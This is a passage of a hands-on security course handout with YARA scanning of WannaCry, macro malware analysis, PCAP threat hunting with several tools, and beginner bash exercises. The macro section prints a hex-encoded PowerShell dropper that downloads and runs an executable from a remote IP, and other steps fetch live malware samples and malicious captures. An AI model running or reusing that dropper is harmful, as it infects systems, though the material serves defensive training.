  1149. $string1 = "msg/m_bulgarian.wnry"
  1150. $string2 = "msg/m_chinese (simplified).wnry"
  1151. $string3 = "msg/m_chinese (traditional).wnry"
  1152. $string4 = "msg/m_croatian.wnry"
  1153. $string5 = "msg/m_czech.wnry"
  1154. $string6 = "msg/m_danish.wnry"
  1155. $string7 = "msg/m_dutch.wnry"
  1156. $string8 = "msg/m_english.wnry"
  1157. $string9 = "msg/m_filipino.wnry"
  1158. $string10 = "msg/m_finnish.wnry"
  1159. $string11 = "msg/m_french.wnry"
  1160. $string12 = "msg/m_german.wnry"
  1161. $string13 = "msg/m_greek.wnry"
  1162. $string14 = "msg/m_indonesian.wnry"
  1163. $string15 = "msg/m_italian.wnry"
  1164. $string16 = "msg/m_japanese.wnry"
  1165. $string17 = "msg/m_korean.wnry"
  1166. $string18 = "msg/m_latvian.wnry"
  1167. $string19 = "msg/m_norwegian.wnry"
  1168. $string20 = "msg/m_polish.wnry"
  1169. $string21 = "msg/m_portuguese.wnry"
  1170. $string22 = "msg/m_romanian.wnry"
  1171. $string23 = "msg/m_russian.wnry"
  1172. $string24 = "msg/m_slovak.wnry"
  1173. $string25 = "msg/m_spanish.wnry"
  1174. $string26 = "msg/m_swedish.wnry"
  1175. $string27 = "msg/m_turkish.wnry"
  1176. $string28 = "msg/m_vietnamese.wnry"
  1177.  
  1178.  
  1179. condition:
  1180. any of ($string*)
  1181. }
  1182. ----------------------------------------------------------------------------
  1183.  
  1184.  
  1185.  
  1186.  
  1187.  
  1188.  
  1189.  
  1190.  
  1191. ---------------------------Type This-----------------------------------
  1192.  
  1193. yara wannacry_2.yar wannacry.exe
  1194.  
  1195. -----------------------------------------------------------------------
  1196.  
  1197.  
  1198.  
  1199. ---------------------------Type This-----------------------------------
  1200. cd ~/students/yourname/security/malware_analysis/quick_yara
  1201.  
  1202. git clone https://github.com/Yara-Rules/rules.git
  1203.  
  1204. cd rules/
  1205.  
  1206. ./index_gen.sh
  1207.  
  1208. ls
  1209.  
  1210. cd malware/
  1211.  
  1212. ls | grep -i ransom
  1213.  
  1214. ls | grep -i rat
  1215.  
  1216. ls | grep -i toolkit
  1217.  
  1218. ls | grep -i apt
  1219.  
  1220. cd ..
  1221.  
  1222. cd capabilities/
  1223.  
  1224. ls
  1225.  
  1226. cat capabilities.yar
  1227.  
  1228. cd ..
  1229.  
  1230. cd cve_rules/
  1231.  
  1232. ls
  1233.  
  1234. cd ..
  1235.  
  1236. ./index_gen.sh
  1237.  
  1238. cd ..
  1239.  
  1240. yara -w rules/index.yar wannacry.exe
  1241.  
  1242.  
  1243. ----------------------------------------------------------------------
  1244.  
  1245.  
  1246. References:
  1247. https://www.slideshare.net/JohnLaycock1/yet-another-yara-allocution-yaya
  1248. https://www.slideshare.net/KasperskyLabGlobal/upping-the-apt-hunting-game-learn-the-best-yara-practices-from-kaspersky
  1249.  
  1250.  
  1251.  
  1252.  
  1253.  
  1254.  
  1255.  
  1256. #####################################################
  1257. # Analyzing Macro Embedded Malware #
  1258. #####################################################
  1259. ---------------------------Type This-----------------------------------
  1260. cd ~/students/yourname/security/malware_analysis
  1261.  
  1262. mkdir macro_docs
  1263.  
  1264. cd macro_docs
  1265.  
  1266. wget https://infosecaddicts-files.s3.amazonaws.com/064016.zip
  1267.  
  1268. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  1269.  
  1270. unzip oledump_V0_0_22.zip
  1271.  
  1272. unzip 064016.zip
  1273. infected
  1274.  
  1275. python oledump.py 064016.doc
  1276.  
  1277. python oledump.py 064016.doc -s A4 -v
  1278. -----------------------------------------------------------------------
  1279.  
  1280.  
  1281.  
  1282. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  1283. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  1284.  
  1285. ---------------------------Type This-----------------------------------
  1286. python oledump.py 064016.doc -s A5 -v
  1287. -----------------------------------------------------------------------
  1288.  
  1289. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  1290.  
  1291. ---------------------------Type This-----------------------------------
  1292. python oledump.py 064016.doc -s A3 -v
  1293.  
  1294. - Look for "GVhkjbjv" and you should see:
  1295.  
  1296. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  1297.  
  1298. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  1299. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  1300. -----------------------------------------------------------------------
  1301.  
  1302.  
  1303.  
  1304.  
  1305. #########################################
  1306. # Security Operations Center Job Roles #
  1307. # Intrusion Analysis Level 1 #
  1308. #########################################
  1309. Required Technical Skills: Comfortable with basic Linux/Windows (MCSA/Linux+)
  1310. Comfortable with basic network (Network+)
  1311. Comfortable with security fundamentals (Security+)
  1312.  
  1313.  
  1314.  
  1315.  
  1316.  
  1317. Job Task: Process security events, follow incident response triage playbook
  1318.  
  1319. #########################################
  1320. # Security Operations Center Job Roles #
  1321. # Intrusion Analysis Level 2 #
  1322. #########################################
  1323.  
  1324. Required Technical Skills: Comfortable with basic Linux/Windows system administration
  1325. Comfortable with basic network administration
  1326. Comfortable with basic programming
  1327. Comfortable researching IT security issues
  1328.  
  1329.  
  1330.  
  1331.  
  1332.  
  1333. Job Task: Perform detailed malware analysis, assist with development of the incident response triage playbook
  1334.  
  1335. Sample Playbook: https://infosecaddicts-files.s3.amazonaws.com/IR-Program-and-Playbooks.zip
  1336.  
  1337.  
  1338.  
  1339. #########################################
  1340. # Security Operations Center Job Roles #
  1341. # Intrusion Analysis Level 3 #
  1342. #########################################
  1343.  
  1344. Required Technical Skills: Strong statistical analysis background
  1345. Strong programming background (C, C++, Java, Assembly, scripting languages)
  1346. Advanced system/network administration background
  1347. Comfortable researching IT security issues
  1348.  
  1349.  
  1350.  
  1351.  
  1352.  
  1353. Job Task: Perform detailed malware analysis
  1354. Perform detailed statistical analysis
  1355. Assist with development of the incident response triage playbook
  1356.  
  1357.  
  1358.  
  1359.  
  1360. #################################################
  1361. # Good references for learning Malware Analysis #
  1362. #################################################
  1363.  
  1364. References:
  1365. https://www.slideshare.net/SamBowne/cnit-126-ch-0-malware-analysis-primer-1-basic-static-techniques
  1366. https://www.slideshare.net/grecsl/malware-analysis-101-n00b-to-ninja-in-60-minutes-at-bsideslv-on-august-5-2014
  1367. https://www.slideshare.net/Bletchley131/intro-to-static-analysis
  1368.  
  1369.  
  1370.  
  1371. ##################
  1372. # Day 2 Homework #
  1373. ##################
  1374.  
  1375. Task Option 1: Basic Shell Scripting
  1376. ------------------------------------
  1377. Watch and do all of the exercises in the video https://www.youtube.com/watch?v=GtovwKDemnI
  1378. Create a word document that contains the screenshots of the tasks performed in this video
  1379. Name the word document 'YourFirstName-YourLastName-LinuxDay2-ShellScripting.docx' (ex: 'Joseph-McCray-LinuxDay2-ShellScripting.docx')
  1380. Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow
  1381.  
  1382.  
  1383. Task Option 2: Advanced Shell Scripting
  1384. ---------------------------------------
  1385. Watch and do all of the exercises in the video https://www.youtube.com/watch?v=aNQCl_ByM20&t=4045s
  1386. Create a word document that contains the screenshots of the tasks performed in this video
  1387. Name the word document 'YourFirstName-YourLastName-LinuxDay2-AdvancedShellScripting.docx' (ex: 'Joseph-McCray-LinuxDay2-AdvancedShellScripting.docx')
  1388. Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow
  1389.  
  1390.  
  1391.  
  1392.  
  1393.  
  1394.  
  1395.  
  1396.  
  1397.  
  1398.  
  1399.  
  1400.  
  1401.  
  1402. #####################################
  1403. ############################## # Day 3: Threat Hunting on the wire # ##############################
  1404. #####################################
  1405.  
  1406.  
  1407.  
  1408.  
  1409. - After logging please open a terminal window and type the following commands:
  1410. ---------------------------Type This-----------------------------------
  1411. cd ~/students/yourname/security/
  1412. mkdir pcap_analysis
  1413. cd pcap_analysis
  1414. -----------------------------------------------------------------------
  1415.  
  1416.  
  1417.  
  1418.  
  1419. ##################################################################
  1420. # Analyzing a PCAP Prads #
  1421. # Note: run as regular user #
  1422. ##################################################################
  1423.  
  1424. ---------------------------Type this as a regular user----------------------------------
  1425. cd ~/students/yourname/security/pcap_analysis/
  1426.  
  1427. mkdir prads
  1428.  
  1429. cd prads
  1430.  
  1431. wget http://45.63.104.73/suspicious-time.pcap
  1432.  
  1433. prads -r suspicious-time.pcap -l prads-asset.log
  1434.  
  1435. cat prads-asset.log | less
  1436.  
  1437. cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
  1438.  
  1439. cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
  1440.  
  1441. cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
  1442. -----------------------------------------------------------------------
  1443.  
  1444.  
  1445.  
  1446.  
  1447. ##################################
  1448. # PCAP Analysis with ChaosReader #
  1449. # Note: run as regular user #
  1450. ##################################
  1451. ---------------------------Type this as a regular user----------------------------------
  1452. cd ~/students/yourname/security/pcap_analysis/
  1453.  
  1454. mkdir chaos_reader/
  1455.  
  1456. cd chaos_reader/
  1457.  
  1458. wget http://45.63.104.73/suspicious-time.pcap
  1459.  
  1460. wget http://45.63.104.73/chaosreader.pl
  1461.  
  1462. perl chaosreader.pl suspicious-time.pcap
  1463.  
  1464. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  1465.  
  1466. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  1467.  
  1468.  
  1469. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  1470.  
  1471.  
  1472.  
  1473. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u | awk '{print $5}' > url.lst
  1474.  
  1475.  
  1476. wget https://raw.githubusercontent.com/Open-Sec/forensics-scripts/master/check-urls-virustotal.py
  1477.  
  1478.  
  1479. python check-urls-virustotal.py url.lst
  1480.  
  1481.  
  1482.  
  1483. ------------------------------------------------------------------------
  1484.  
  1485.  
  1486.  
  1487.  
  1488.  
  1489.  
  1490.  
  1491.  
  1492. #############################
  1493. # PCAP Analysis with tshark #
  1494. # Note: run as regular user #
  1495. #############################
  1496. ---------------------------Type this as a regular user---------------------------------
  1497. cd ~/students/yourname/security/pcap_analysis/
  1498.  
  1499. mkdir tshark
  1500.  
  1501. cd tshark/
  1502.  
  1503. wget http://45.63.104.73/suspicious-time.pcap
  1504.  
  1505. tshark -i ens3 -r suspicious-time.pcap -qz io,phs
  1506.  
  1507. tshark -r suspicious-time.pcap -qz ip_hosts,tree
  1508.  
  1509. tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  1510.  
  1511. tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  1512.  
  1513.  
  1514. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  1515.  
  1516. whois rapidshare.com.eyu32.ru
  1517.  
  1518. whois sploitme.com.cn
  1519.  
  1520. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  1521.  
  1522. tshark -r suspicious-time.pcap -qz http_req,tree
  1523.  
  1524. tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  1525.  
  1526. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  1527. ------------------------------------------------------------------------
  1528.  
  1529.  
  1530.  
  1531.  
  1532.  
  1533. ###############################
  1534. # Extracting files from PCAPs #
  1535. # Note: run as regular user #
  1536. ###############################
  1537. ---------------------------Type this as a regular user---------------------------------
  1538. cd ~/students/yourname/security/pcap_analysis/
  1539.  
  1540. mkdir extract_files
  1541.  
  1542. cd extract_files
  1543.  
  1544. wget http://45.63.104.73/suspicious-time.pcap
  1545.  
  1546. foremost -v -i suspicious-time.pcap
  1547.  
  1548. cd output
  1549.  
  1550. ls
  1551.  
  1552. cat audit.txt
  1553.  
  1554. cd exe
  1555.  
  1556. wget https://raw.githubusercontent.com/GREEKYnikhilsharma/Xen0ph0n-VirusTotal_API_Tool-Python3/master/vtlite.py
  1557. ---------------------------------------------------------------------------------------
  1558.  
  1559.  
  1560. ******* NOTE: You will need to put your virustotal API key in vtlite.py *******
  1561. * Create an account in virustotal > login > click on your profile > API key > copy API key > in terminal do nano vtlite.py >
  1562. * Paste the API key in where it says > profit
  1563. ********************************************************************************
  1564.  
  1565. ---------------------------Type this as a regular user---------------------------------
  1566. for f in *.exe; do python3 vtlite.py -s $f; sleep 20; done
  1567. ---------------------------------------------------------------------------------------
  1568.  
  1569.  
  1570. ###############################
  1571. # PCAP Analysis with Suricata #
  1572. # Note: run as root #
  1573. ###############################
  1574. --------------------------Type this as root--------------------------------
  1575. cd ~/students/yourname/security/pcap_analysis/
  1576.  
  1577. mkdir suricata
  1578.  
  1579. cd suricata/
  1580.  
  1581. wget http://45.63.104.73/suspicious-time.pcap
  1582.  
  1583. mkdir suri
  1584.  
  1585. sudo suricata -c /etc/suricata/suricata.yaml -r suspicious-time.pcap -l suri/
  1586.  
  1587. cd suri/
  1588.  
  1589. cat stats.log | less
  1590.  
  1591. cat eve.json |grep -E "e\":\"http"|jq ".timestamp,.http"|csplit - /..T..:/ {*}
  1592.  
  1593. cat xx01
  1594.  
  1595. cat xx02
  1596.  
  1597. cat xx03
  1598.  
  1599. cat xx04
  1600.  
  1601. cat xx05
  1602.  
  1603. cat xx06
  1604. ------------------------------------------------------------------------
  1605.  
  1606.  
  1607. #############################
  1608. # PCAP Analysis with Yara #
  1609. # Note: run as regular user #
  1610. #############################
  1611. -------------------------Type this as a regular user----------------------------------
  1612. cd ~/students/yourname/security/pcap_analysis/
  1613.  
  1614. git clone https://github.com/kevthehermit/YaraPcap.git
  1615. cd YaraPcap/
  1616. wget http://45.63.104.73/suspicious-time.pcap
  1617. wget https://github.com/Yara-Rules/rules/archive/master.zip
  1618. unzip master.zip
  1619. cd rules-master/
  1620. ls
  1621. cat index.yar
  1622. clear
  1623. ./index_gen.sh
  1624. cd ..
  1625. mkdir matching_files/
  1626. python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/
  1627. whereis tcpflow
  1628. vi yaraPcap.py **** fix line 35 with correct path to tcpflow (/usr/bin/tcpflow)****
  1629. python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/
  1630. cd matching_files/
  1631. ls
  1632. cat report.txt
  1633. ------------------------------------------------------------------------
  1634.  
  1635.  
  1636.  
  1637.  
  1638. #################################################################################
  1639. # Now that you know packet analysis here are the next set of files to play with #
  1640. #################################################################################
  1641. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/APT41/APT41_StoreSyncSvc.pcap
  1642. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Agent_Tesla/agenttesla_09July2019.pcap
  1643. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/CVE-2019-9978/CVE-2019-9978_attempt_05May2019.pcap
  1644. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Powershell/Powershell_script_19Dec2019.pcap
  1645. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/sharik_smoke/sharik_smoke.pcap
  1646. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Microsoft/CVE-2019-0703.pcap
  1647. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Microsoft/CVE-2019-0801.pcap
  1648.  
  1649.  
  1650.  
  1651. References:
  1652. https://www.slideshare.net/j0b1n/tcpdump-hunter
  1653. https://www.slideshare.net/AviNetworks/reconsider-tcpdump-for-modern-troubleshooting
  1654.  
  1655.  
  1656. ##################
  1657. # Day 3 Homework #
  1658. ##################
  1659.  
  1660. Task Option 1: Shell Scripting
  1661. ------------------------------------
  1662. Watch and do all of the exercises in the video https://www.youtube.com/watch?v=hwrnmQumtPw
  1663. Create a word document that contains the screenshots of the tasks performed in this video
  1664. Name the word document 'YourFirstName-YourLastName-LinuxDay3-ShellScripting.docx' (ex: 'Joseph-McCray-LinuxDay3-ShellScripting.docx')
  1665. Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow
  1666.  
  1667.  
  1668. Task Option 2: Python3
  1669. ---------------------------------------
  1670. Watch and do all of the exercises in the first 7 videos from https://www.youtube.com/playlist?list=PLypxmOPCOkHVzhKRcWzEkQXCnmHezGVeB
  1671. Create a word document that contains the screenshots of the tasks performed in these videos
  1672. Name the word document 'YourFirstName-YourLastName-LinuxDay3-AdvancedShellScripting.docx' (ex: 'Joseph-McCray-LinuxDay3-AdvancedShellScripting.docx')
  1673. Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow
  1674.  
  1675.  
  1676.  
  1677.  
  1678.  
  1679.  
  1680.  
  1681.  
  1682.  
  1683.  
  1684.  
  1685.  
  1686. ################################################################
  1687. ############################## # Day 4: Programming Fundamentals & Offensive Cyber Operations # ##############################
  1688. ################################################################
  1689.  
  1690. ------------------------------- Programming fundamentals -------------------------------
  1691.  
  1692.  
  1693. Joe rule #1 single quote, single quote, left arrow
  1694. --------------------------------------------------
  1695. '' <-- as soon as you type '', then hit your left arrow key to put you inside of the ''
  1696. "" <-- as soon as you type "", then hit your left arrow key to put you inside of the ""
  1697. something() <-- as soon as you type (), then hit your left arrow key to put you inside of the ()
  1698. something[] <-- as soon as you type [], then hit your left arrow key to put you inside of the []
  1699. something{} <-- as soon as you type {}, then hit your left arrow key to put you inside of the {}
  1700.  
  1701. -- Now kick it up a notch
  1702. [] <-- as soon as you type [], then hit your left arrow key to put you inside of the []
  1703. [()] <-- as soon as you type (), then hit your left arrow key to put you inside of the ()
  1704. [({})] <-- as soon as you type {}, then hit your left arrow key to put you inside of the {}
  1705. [({"''"})] <-- as soon as you type "", then hit your left arrow key to put you inside of the ""
  1706. [({"''"})] <-- as soon as you type '', then hit your left arrow key to put you inside of the ''
  1707.  
  1708.  
  1709.  
  1710. Joe rule #2 "Code can only do 3 things"
  1711. --------------------------------------
  1712.  
  1713. Process - read, write, math
  1714.  
  1715. Decision - if/then
  1716.  
  1717. Loop - for
  1718.  
  1719.  
  1720.  
  1721.  
  1722. Joe rule #3 "Never more than 5-10"
  1723. ---------------------------------
  1724.  
  1725. -----5 lines of code----
  1726. line 1 blah blah blah
  1727. line 2 blah blah blah
  1728. line 3 blah blah blah
  1729. line 4 blah blah blah
  1730. line 5 blah blah blah
  1731.  
  1732.  
  1733. sales_tax = price * tax_rate
  1734.  
  1735.  
  1736. 0.80 = 10 * 0.08
  1737.  
  1738. -----5-10 lines of code---- = function
  1739. price = 10
  1740.  
  1741. def st():
  1742. sales_tax = price * 0.08
  1743. print(sales_tax)
  1744.  
  1745.  
  1746. st(10) <---- how to run a function
  1747.  
  1748. -----5-10 functions ---- = class "tax class"
  1749. st()
  1750. lt()
  1751. pt()
  1752. it()
  1753. dt()
  1754.  
  1755.  
  1756.  
  1757. tax.st()
  1758. tax.lt()
  1759.  
  1760. -----5-10 functions ---- = class "expense class"
  1761. gas()
  1762. elec()
  1763. water()
  1764. food()
  1765. beer()
  1766.  
  1767. expense.gas()
  1768.  
  1769.  
  1770. -----5-10 classes ---- = module "finance module"
  1771.  
  1772. import finance
  1773.  
  1774.  
  1775. ------------------------------- Summary of fundamentals ------------------------------
  1776.  
  1777.  
  1778.  
  1779.  
  1780.  
  1781.  
  1782.  
  1783.  
  1784.  
  1785.  
  1786.  
  1787.  
  1788.  
  1789.  
  1790.  
  1791. Let's look at a simple for loop
  1792. ---------------------------Type This-----------------------------------
  1793. cd ~/students/yourname/
  1794. mkdir programming_fundamentals
  1795. cd programming_fundamentals
  1796. cp ~/wannacry.exe .
  1797. nano forloop_malware_analysis.sh
  1798.  
  1799. ---------------------------Paste This-----------------------------------
  1800. #!/bin/bash
  1801.  
  1802. ransomeware=('CryptImportKey' 'CryptDecrypt' 'CryptDestroyKey' 'CryptReleaseContext' 'EntryPo int' 'CryptAcquireContextA' 'lstrcpyW' 'lstrlenW' 'lstrcatW' 'CloseHandle' 'lstrcmpiA' 'RegOp enKeyExA' 'lstrlenA' 'RegSetValueExA' 'RegCloseKey' 'RegQueryValueExA' 'GetLastError' 'GetEnv ironmentVariableA' 'ShellExecuteA' 'Sleep' 'CryptGenKey' 'CryptExportKey' 'CryptEncrypt' 'KiU serExceptionDispatcher' 'RtlZeroMemory' 'MultiByteToWideChar' 'lstrcatA' 'RegCreateKeyA' 'SHC hangeNotify' 'SetErrorMode' 'CryptGenKey' 'CryptImportKey');
  1803.  
  1804. # This is just a test to read all of the values in the array
  1805.  
  1806. #echo ${ransomeware[@]}
  1807.  
  1808. # This is a quick for loop to run strings and grep for everything in the array
  1809. # Reference: http://www.masteringunixshell.net/qa3/bash-how-to-echo-array.html
  1810.  
  1811. for ELEMENT in ${ransomeware[@]}
  1812. do
  1813. #echo string: $ELEMENT
  1814. strings wannacry.exe | grep -i $ELEMENT
  1815. done
  1816. --------------------------------------------------
  1817.  
  1818.  
  1819.  
  1820.  
  1821.  
  1822.  
  1823.  
  1824.  
  1825. Ok, now let's run it
  1826. ---------------------------Type This-----------------------------------
  1827. chmod +x forloop_malware_analysis.sh
  1828. ./forloop_malware_analysis.sh
  1829. ------------------------------------------------------------------------
  1830.  
  1831.  
  1832.  
  1833.  
  1834.  
  1835.  
  1836. Let's look at a simple menu
  1837. ---------------------------Type This-----------------------------------
  1838.  
  1839. nano simple_menu.sh
  1840.  
  1841. ---------------------------Paste This-----------------------------------
  1842. #!/bin/bash
  1843. # simple menu to do various functions
  1844. # Reference: http://www.seafriends.org.nz/linux/menus.htm
  1845.  
  1846.  
  1847. while [ answer != "0" ]
  1848. do
  1849. clear
  1850. echo "Select from the following functions"
  1851. echo " 0 exit"
  1852. echo " 1 Network Asset Inventory"
  1853. echo " 2 IP to IP communication and URL lookup"
  1854. echo " 3 Extract files"
  1855. echo " 4 exit"
  1856.  
  1857.  
  1858. read -p " ?" answer
  1859. case $answer in
  1860. 0) break ;;
  1861. 1) echo "Network Asset Inventory"
  1862. prads -r suspicious-time.pcap -l prads-asset.log
  1863. cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
  1864. cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
  1865. cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
  1866. ;;
  1867. 2) echo "IP to IP communication and URL lookup"
  1868. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  1869. ;;
  1870. 3) echo "Extract files"
  1871. foremost -v -i suspicious-time.pcap
  1872. cat output/audit.txt
  1873. ;;
  1874. 4) break ;;
  1875. *) break ;;
  1876. esac
  1877. echo "press RETURN for menu"
  1878. read key
  1879. done
  1880. exit 0
  1881. --------------------------------------------------
  1882.  
  1883.  
  1884.  
  1885.  
  1886.  
  1887.  
  1888.  
  1889.  
  1890. Ok, now let's run it
  1891. ---------------------------Type This-----------------------------------
  1892. chmod +x simple_menu.sh
  1893. ./simple_menu.sh
  1894. ------------------------------------------------------------------------
  1895.  
  1896.  
  1897.  
  1898.  
  1899.  
  1900.  
  1901. Let's look at a simple function
  1902. ---------------------------Type This-----------------------------------
  1903.  
  1904. nano hello_world.sh
  1905.  
  1906. ---------------------------Paste This-----------------------------------
  1907. #!/bin/bash
  1908. # Reference: https://linuxize.com/post/bash-functions/
  1909.  
  1910. hello_world () {
  1911. echo 'hello, world'
  1912. }
  1913.  
  1914. hello_world
  1915. --------------------------------------------------
  1916.  
  1917.  
  1918.  
  1919.  
  1920.  
  1921.  
  1922. Ok, now let's run it
  1923. ---------------------------Type This-----------------------------------
  1924. chmod +x hello_world.sh
  1925. ./hello_world.sh
  1926. ------------------------------------------------------------------------
  1927.  
  1928.  
  1929.  
  1930.  
  1931. Let's ask the user a question
  1932. ---------------------------Type This-----------------------------------
  1933.  
  1934. nano prompt_for_user_input.sh
  1935.  
  1936. ---------------------------Paste This-----------------------------------
  1937. #!/bin/bash
  1938. # Reference: https://tecadmin.net/prompt-user-input-in-linux-shell-script/
  1939.  
  1940. read -p "Enter Your Name: " username
  1941. echo "Welcome $username!"
  1942. ------------------------------------------------------------------------
  1943.  
  1944.  
  1945.  
  1946.  
  1947.  
  1948.  
  1949. Ok, now let's run it
  1950. ---------------------------Type This-----------------------------------
  1951. chmod +x prompt_for_user_input.sh
  1952. ./prompt_for_user_input.sh
  1953. ------------------------------------------------------------------------
  1954.  
  1955.  
  1956.  
  1957.  
  1958.  
  1959.  
  1960. Let's make the function do something useful
  1961. ---------------------------Type This-----------------------------------
  1962.  
  1963. nano ip_2_url_lookup.sh
  1964.  
  1965. ---------------------------Paste This-----------------------------------
  1966. #!/bin/bash
  1967. # Reference: https://linuxize.com/post/bash-functions/
  1968.  
  1969. do_stuff () {
  1970. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  1971. }
  1972.  
  1973. do_stuff
  1974. ------------------------------------------------------------------------
  1975.  
  1976.  
  1977.  
  1978.  
  1979.  
  1980.  
  1981. Ok, now let's run it
  1982. ---------------------------Type This-----------------------------------
  1983. chmod +x ip_2_url_lookup.sh
  1984. ./ip_2_url_lookup.sh
  1985. ------------------------------------------------------------------------
  1986.  
  1987.  
  1988.  
  1989.  
  1990. Let's grab some PCAP files
  1991. ---------------------------Type This-----------------------------------
  1992. cd ~/students/yourname/programming_fundamentals
  1993. mkdir pcaps
  1994. cd pcaps
  1995. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/APT41/APT41_StoreSyncSvc.pcap
  1996. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Agent_Tesla/agenttesla_09July2019.pcap
  1997. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/CVE-2019-9978/CVE-2019-9978_attempt_05May2019.pcap
  1998. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Powershell/Powershell_script_19Dec2019.pcap
  1999. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/sharik_smoke/sharik_smoke.pcap
  2000. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Microsoft/CVE-2019-0703.pcap
  2001. wget https://github.com/SpiderLabs/IOCs-IDPS/raw/master/Microsoft/CVE-2019-0801.pcap
  2002. ------------------------------------------------------------------------
  2003.  
  2004.  
  2005. Let's read file names into an array
  2006. ---------------------------Type This-----------------------------------
  2007.  
  2008. nano parse_pcap_file_names.sh
  2009.  
  2010. ---------------------------Paste This-----------------------------------
  2011. #!/bin/bash
  2012. # Reference: https://delightlylinux.wordpress.com/2017/04/08/put-filenames-in-bash-array/
  2013.  
  2014. #!/bin/bash
  2015.  
  2016. declare -a arrPCAPs
  2017. for file in *.pcap
  2018. do
  2019. arrPCAPs=("${PCAPs[@]}" "$file")
  2020. echo ${arrPCAPs[@]}
  2021. done
  2022. ------------------------------------------------------------------------
  2023.  
  2024.  
  2025.  
  2026.  
  2027.  
  2028.  
  2029. Ok, now let's run it
  2030. ---------------------------Type This-----------------------------------
  2031. chmod +x parse_pcap_file_names.sh
  2032. ./parse_pcap_file_names.sh
  2033. ------------------------------------------------------------------------
  2034.  
  2035.  
  2036.  
  2037.  
  2038.  
  2039.  
  2040.  
  2041.  
  2042.  
  2043.  
  2044.  
  2045.  
  2046.  
  2047.  
  2048.  
  2049. ##################
  2050. # Day 4 Homework #
  2051. ##################
  2052.  
  2053. Task Option 1: Shell Scripting
  2054. ------------------------------------
  2055. Watch and do all of the exercises in the video https://www.youtube.com/watch?v=hwrnmQumtPw
  2056. Create a word document that contains the screenshots of the tasks performed in this video
